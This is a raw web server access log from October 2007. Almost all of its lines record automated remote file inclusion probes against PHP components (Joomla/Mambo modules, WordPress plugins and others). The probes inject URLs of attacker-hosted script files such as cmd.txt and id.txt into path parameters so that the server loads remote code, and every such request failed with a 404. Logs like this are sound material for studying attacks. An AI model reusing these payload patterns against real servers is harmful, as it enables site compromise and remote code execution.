68.187.13.26 - - [15/Oct/2007:12:17:11 -0700] "GET //administrator/components/com_webring/admin.webring.docs.php?component_dir=http://brendonmorris.co.za/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
153.39.147.187 - - [15/Oct/2007:12:17:12 -0700] "GET /logs/access_071015.log HTTP/1.1" 200 1180619 "http://www.galf.org/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.12) Gecko/20070718 Fedora/1.5.0.12-4.fc6 Firefox/1.5.0.12" "www.galf.org"
220.237.14.135 - - [15/Oct/2007:12:17:19 -0700] "GET /logs/access_070910.log//components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://prvib.braindead.hu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
220.237.14.135 - - [15/Oct/2007:12:17:20 -0700] "GET /logs/access_070820.log//components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://prvib.braindead.hu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
68.187.13.26 - - [15/Oct/2007:12:17:30 -0700] "GET /logs//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://brendonmorris.co.za/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.165.180.58 - - [15/Oct/2007:12:17:34 -0700] "GET /logs/index2.php?x=http://www.wsteam.net/infect.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
82.165.180.58 - - [15/Oct/2007:12:17:34 -0700] "GET /index2.php?x=http://www.wsteam.net/infect.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
212.227.21.229 - - [15/Oct/2007:12:17:41 -0700] "GET /logs/access.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=uid=30(wwwrun)%20gid=8(www)%20groups=8(www),2523(psaserv)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
212.227.21.229 - - [15/Oct/2007:12:17:41 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=uid=30(wwwrun)%20gid=8(www)%20groups=8(www),2523(psaserv)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
212.227.21.229 - - [15/Oct/2007:12:17:42 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=uid=30(wwwrun)%20gid=8(www)%20groups=8(www),2523(psaserv)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
217.127.194.226 - - [15/Oct/2007:12:17:56 -0700] "GET /logs/access_070709.log/index.php?u=http://www.iltempiodiperugia.it/images/gif.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.127.194.226 - - [15/Oct/2007:12:17:57 -0700] "GET /logs/index.php?u=http://www.iltempiodiperugia.it/images/gif.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.104.47.74 - - [15/Oct/2007:12:18:11 -0700] "GET /logs/%030%22/customer/product.php?%22http://www.envio-web.com/speedy/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.104.47.74 - - [15/Oct/2007:12:18:11 -0700] "GET /%030%22/customer/product.php?%22http://www.envio-web.com/speedy/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.61.203.236 - - [15/Oct/2007:12:18:31 -0700] "GET /logs/access_070826.log/index.php?page=uid=48(apache)%20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
65.61.203.236 - - [15/Oct/2007:12:18:31 -0700] "GET /index.php?page=uid=48(apache)%20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
65.61.203.236 - - [15/Oct/2007:12:18:31 -0700] "GET /logs/index.php?page=uid=48(apache)%20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
82.165.237.19 - - [15/Oct/2007:12:18:49 -0700] "GET /logs/access_071015.log HTTP/1.0" 200 1180619 "-" "Wget/1.10" "www.galf.org"
212.227.21.229 - - [15/Oct/2007:12:19:39 -0700] "GET /logs/access_070723.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=uid=30(wwwrun)%20gid=8(www)%20groups=8(www),2523(psaserv)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.76"
82.165.180.58 - - [15/Oct/2007:12:20:17 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.wsteam.net/infect.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.141.48.120 - - [15/Oct/2007:12:21:39 -0700] "GET /logs/index2.php?x=http://www.wsteam.net/infect.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.141.48.120 - - [15/Oct/2007:12:21:40 -0700] "GET /index2.php?x=http://www.wsteam.net/infect.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
212.227.21.229 - - [15/Oct/2007:12:22:40 -0700] "GET /logs/access_070723.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=uid=30(wwwrun)%20gid=8(www)%20groups=8(www),2523(psaserv)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
212.227.21.229 - - [15/Oct/2007:12:22:40 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=uid=30(wwwrun)%20gid=8(www)%20groups=8(www),2523(psaserv)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
212.227.21.229 - - [15/Oct/2007:12:22:40 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=uid=30(wwwrun)%20gid=8(www)%20groups=8(www),2523(psaserv)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
212.227.21.229 - - [15/Oct/2007:12:22:43 -0700] "GET /logs/access_070820.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=uid=30(wwwrun)%20gid=8(www)%20groups=8(www),2523(psaserv)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
80.74.144.87 - - [15/Oct/2007:12:23:14 -0700] "GET /logs/access_070618.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://mastimagic.org/portal/modules/mx_tinies/includes/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.74.144.87 - - [15/Oct/2007:12:23:14 -0700] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://mastimagic.org/portal/modules/mx_tinies/includes/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.74.144.87 - - [15/Oct/2007:12:23:15 -0700] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://mastimagic.org/portal/modules/mx_tinies/includes/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
68.187.13.26 - - [15/Oct/2007:12:24:59 -0700] "GET /logs/access_071001.log//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://brendonmorris.co.za/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.74.144.87 - - [15/Oct/2007:12:25:22 -0700] "GET /logs/access.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://mastimagic.org/portal/modules/mx_tinies/includes/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
139.86.138.50 - - [15/Oct/2007:12:25:55 -0700] "GET /phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 404 275 "http://www.altavista.com/web/results?itag=ody&kgs=1&kls=0&q=search&stq=0" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.7) Gecko/2006031 Firefox/2.0.0" "www.galf.org"
194.95.188.39 - - [15/Oct/2007:12:26:31 -0700] "GET /logs/index2.php?x=http://www.wsteam.net/infect.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.95.188.39 - - [15/Oct/2007:12:26:32 -0700] "GET /index2.php?x=http://www.wsteam.net/infect.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.193.248.155 - - [15/Oct/2007:12:27:55 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.select-us.info/kunstkabinett/catalog/images/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.169.134.8 - - [15/Oct/2007:12:29:12 -0700] "GET /logs/access_070903.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.candanfanclub.com/cache/inf.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
80.86.92.9 - - [15/Oct/2007:12:29:44 -0700] "GET /logs/access_070709.log/index.php?u=http://www.iltempiodiperugia.it/images/gif.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.86.92.9 - - [15/Oct/2007:12:29:45 -0700] "GET /logs/index.php?u=http://www.iltempiodiperugia.it/images/gif.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.71.208.150 - - [15/Oct/2007:12:30:02 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://amsterdam4.interfree.it/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.198.145 - - [15/Oct/2007:12:30:18 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://fastquickauctions.com/uploaded/cache/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.169.134.8 - - [15/Oct/2007:12:31:10 -0700] "GET /logs/access.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.candanfanclub.com/cache/inf.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
68.187.13.26 - - [15/Oct/2007:12:31:20 -0700] "GET /logs/access_070827.log/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://brendonmorris.co.za/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.106.55.105 - - [15/Oct/2007:12:32:17 -0700] "GET /logs/admin/business_inc/saveserver.php?thisdir=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.106.55.105 - - [15/Oct/2007:12:32:17 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.198.145 - - [15/Oct/2007:12:33:49 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://fastquickauctions.com/uploaded/cache/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.62.7.50 - - [15/Oct/2007:12:34:17 -0700] "GET /logs/admin/business_inc/saveserver.php?thisdir=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.62.7.50 - - [15/Oct/2007:12:34:17 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.173.252.15 - - [15/Oct/2007:12:34:48 -0700] "GET /logs/admin/business_inc/saveserver.php?thisdir=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.173.252.15 - - [15/Oct/2007:12:34:49 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
217.71.208.150 - - [15/Oct/2007:12:36:03 -0700] "GET /logs/access_070806.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://amsterdam4.interfree.it/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
65.98.120.207 - - [15/Oct/2007:12:36:20 -0700] "GET /logs/admin/business_inc/saveserver.php?thisdir=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
65.98.120.207 - - [15/Oct/2007:12:36:20 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
70.84.103.42 - - [15/Oct/2007:12:36:26 -0700] "GET /logs/admin/business_inc/saveserver.php?thisdir=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
70.84.103.42 - - [15/Oct/2007:12:36:26 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
67.59.185.50 - - [15/Oct/2007:12:36:32 -0700] "GET /logs/newspublish/include.php?path[docroot]=uid=48(apache)%20gid=48(apache)%20groups=48(apache),2523(psaserv)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.59.185.50 - - [15/Oct/2007:12:36:32 -0700] "GET /newspublish/include.php?path[docroot]=uid=48(apache)%20gid=48(apache)%20groups=48(apache),2523(psaserv)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.106.55.105 - - [15/Oct/2007:12:36:41 -0700] "GET /logs/access.log/admin/business_inc/saveserver.php?thisdir=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.134.8 - - [15/Oct/2007:12:36:55 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.candanfanclub.com/cache/inf.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
209.62.7.50 - - [15/Oct/2007:12:36:56 -0700] "GET /logs/access.log/admin/business_inc/saveserver.php?thisdir=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.173.252.15 - - [15/Oct/2007:12:37:27 -0700] "GET /logs/access.log/admin/business_inc/saveserver.php?thisdir=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.12.161 - - [15/Oct/2007:12:37:48 -0700] "GET /logs/access.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=hhttp://geunyoung.hs.kr/board/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.12.161 - - [15/Oct/2007:12:37:48 -0700] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=hhttp://geunyoung.hs.kr/board/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.12.161 - - [15/Oct/2007:12:37:48 -0700] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=hhttp://geunyoung.hs.kr/board/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
67.59.185.50 - - [15/Oct/2007:12:38:02 -0700] "GET /logs/access_070924.log/newspublish/include.php?path[docroot]=uid=48(apache)%20gid=48(apache)%20groups=48(apache),2523(psaserv)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.59.185.50 - - [15/Oct/2007:12:38:02 -0700] "GET /newspublish/include.php?path[docroot]=uid=48(apache)%20gid=48(apache)%20groups=48(apache),2523(psaserv)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.59.185.50 - - [15/Oct/2007:12:38:02 -0700] "GET /logs/newspublish/include.php?path[docroot]=uid=48(apache)%20gid=48(apache)%20groups=48(apache),2523(psaserv)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
70.84.103.42 - - [15/Oct/2007:12:38:41 -0700] "GET /logs/access.log/admin/business_inc/saveserver.php?thisdir=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
65.111.180.164 - - [15/Oct/2007:12:38:42 -0700] "GET /logs/access_070924.log/newspublish/include.php?path[docroot]=http://gctk.net/cleanmk/administrator/components/com_extcalendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
65.111.180.164 - - [15/Oct/2007:12:38:42 -0700] "GET /newspublish/include.php?path[docroot]=http://gctk.net/cleanmk/administrator/components/com_extcalendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
65.111.180.164 - - [15/Oct/2007:12:38:42 -0700] "GET /logs/newspublish/include.php?path[docroot]=http://gctk.net/cleanmk/administrator/components/com_extcalendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.163.167.235 - - [15/Oct/2007:12:39:04 -0700] "GET /logs/access.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.bassanesi.com.br/admin/common/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.163.167.235 - - [15/Oct/2007:12:39:05 -0700] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.bassanesi.com.br/admin/common/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.163.167.235 - - [15/Oct/2007:12:39:05 -0700] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.bassanesi.com.br/admin/common/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.163.167.235 - - [15/Oct/2007:12:39:22 -0700] "GET /logs/access_070924.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.bassanesi.com.br/admin/common/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
218.38.12.161 - - [15/Oct/2007:12:39:22 -0700] "GET /logs/access_070924.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=hhttp://geunyoung.hs.kr/board/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
65.98.120.207 - - [15/Oct/2007:12:40:15 -0700] "GET /logs/access.log/admin/business_inc/saveserver.php?thisdir=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.111.180.164 - - [15/Oct/2007:12:40:17 -0700] "GET /logs/access_070903.log/newspublish/include.php?path[docroot]=http://gctk.net/cleanmk/administrator/components/com_extcalendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.169.134.8 - - [15/Oct/2007:12:41:11 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.candanfanclub.com/cache/inf.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
217.71.208.150 - - [15/Oct/2007:12:42:02 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://amsterdam4.interfree.it/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.71.208.150 - - [15/Oct/2007:12:42:03 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://amsterdam4.interfree.it/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.71.208.150 - - [15/Oct/2007:12:42:11 -0700] "GET /logs/access_070709.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://amsterdam4.interfree.it/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
68.180.250.101 - - [15/Oct/2007:12:42:13 -0700] "GET /logs/access_070826.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
134.241.103.23 - - [15/Oct/2007:12:42:44 -0700] "GET /phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 404 275 "http://www.altavista.com/web/results?itag=ody&kgs=1&kls=0&q=search&stq=0" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.7) Gecko/2006031 Firefox/2.0.0" "www.galf.org"
67.59.185.50 - - [15/Oct/2007:12:42:53 -0700] "GET /logs/access_070903.log/newspublish/include.php?path[docroot]=uid=48(apache)%20gid=48(apache)%20groups=48(apache),2523(psaserv)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.248.155 - - [15/Oct/2007:12:43:03 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.select-us.info/kunstkabinett/catalog/images/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.85.47.250 - - [15/Oct/2007:12:44:47 -0700] "GET /logs/access_070903.log/components/com_lmo/lmo.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.85.47.250 - - [15/Oct/2007:12:44:47 -0700] "GET /components/com_lmo/lmo.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.85.47.250 - - [15/Oct/2007:12:44:48 -0700] "GET /logs/components/com_lmo/lmo.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.85.47.250 - - [15/Oct/2007:12:44:48 -0700] "GET /logs/access_070827.log/components/com_lmo/lmo.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
68.187.13.26 - - [15/Oct/2007:12:45:04 -0700] "GET /logs/access_070827.log//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://jasperforge.org/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
68.187.13.26 - - [15/Oct/2007:12:45:05 -0700] "GET //administrator/components/com_webring/admin.webring.docs.php?component_dir=http://jasperforge.org/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
68.187.13.26 - - [15/Oct/2007:12:45:05 -0700] "GET /logs//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://jasperforge.org/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
68.187.13.26 - - [15/Oct/2007:12:45:08 -0700] "GET /logs/access_070827.log//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://brendonmorris.co.za/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
68.187.13.26 - - [15/Oct/2007:12:45:09 -0700] "GET //administrator/components/com_webring/admin.webring.docs.php?component_dir=http://brendonmorris.co.za/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
68.187.13.26 - - [15/Oct/2007:12:45:09 -0700] "GET /logs//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://brendonmorris.co.za/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
65.111.180.164 - - [15/Oct/2007:12:45:19 -0700] "GET /logs/access_070826.log/newspublish/include.php?path[docroot]=http://gctk.net/cleanmk/administrator/components/com_extcalendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
71.252.114.2 - - [15/Oct/2007:12:45:44 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
71.252.114.2 - - [15/Oct/2007:12:45:44 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
81.169.134.8 - - [15/Oct/2007:12:45:53 -0700] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.candanfanclub.com/cache/inf.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.134.8 - - [15/Oct/2007:12:45:53 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.candanfanclub.com/cache/inf.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.134.8 - - [15/Oct/2007:12:46:18 -0700] "GET /logs/access_070917.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.candanfanclub.com/cache/inf.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.134.8 - - [15/Oct/2007:12:46:29 -0700] "GET /logs/access.log//modules/agendax/addevent.inc.php?agendax_path=http://www.candanfanclub.com/cache/inf.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
81.169.134.8 - - [15/Oct/2007:12:46:30 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.candanfanclub.com/cache/inf.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
71.252.114.2 - - [15/Oct/2007:12:46:33 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
71.252.114.2 - - [15/Oct/2007:12:46:34 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.248.155 - - [15/Oct/2007:12:46:41 -0700] "GET /logs/access.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.select-us.info/kunstkabinett/catalog/images/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.248.155 - - [15/Oct/2007:12:46:42 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.select-us.info/kunstkabinett/catalog/images/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.19.131.228 - - [15/Oct/2007:12:47:07 -0700] "GET /logs/access.log/modules/newbb_plus/class/class.forumposts.php?cmd=ls%20-la&bbPath[path]=http://124.0.201.20/bbs000/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
67.19.131.228 - - [15/Oct/2007:12:47:07 -0700] "GET /modules/newbb_plus/class/class.forumposts.php?cmd=ls%20-la&bbPath[path]=http://124.0.201.20/bbs000/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.19.131.228 - - [15/Oct/2007:12:47:07 -0700] "GET /logs/modules/newbb_plus/class/class.forumposts.php?cmd=ls%20-la&bbPath[path]=http://124.0.201.20/bbs000/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.134.8 - - [15/Oct/2007:12:47:21 -0700] "GET /logs/access_070917.log//modules/agendax/addevent.inc.php?agendax_path=http://www.candanfanclub.com/cache/inf.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
